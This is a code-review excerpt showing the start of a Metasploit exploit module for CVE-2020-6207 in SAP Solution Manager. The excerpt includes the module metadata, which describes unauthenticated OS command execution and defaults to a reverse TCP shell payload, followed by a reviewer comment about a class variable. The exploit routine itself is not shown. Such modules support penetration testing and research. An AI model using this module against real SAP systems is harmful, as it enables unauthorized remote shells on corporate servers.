modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb

```diff
@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/sap_solman/client'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Metasploit::Framework::SapSolutionManager::Client
+
+  @agents = Array.new # Array of connected agents
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+            'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
+            'Dmitry Chastuhin', # @chipik The researcher who made first PoC
+            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+          ],
+        'Description' => %q{
+          This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
+          SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
+          checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
+          send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
+
+          Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan
+          agent as the user under which it runs SMDAgent service, usually daaadm.
+        },
+        'References' =>
+          [
+            ['CVE', '2020-6207'],
+            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+          ],
+        'Privileged' => false,
+        'DefaultOptions' => {
+          'Payload' => 'generic/shell_reverse_tcp'
+        },
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Targets' => [ ['Automatic', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('URIPATH', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
+      ]
+    )
+    self.class.agents = Array.new
+  end
+
+  class << self
+    attr_reader :agents
+  end
+
+  class << self
+    attr_writer :agents
+  end
```

Comment:
Same comments regarding the agents here as in the auxiliary module.

Reply:
Removed class var agents in auxiliary and exploit modules: https://github.com/rapid7/metasploit-framework/pull/14924/commits/567f78c532cde53bc23ef90133474a5e8aefd2ec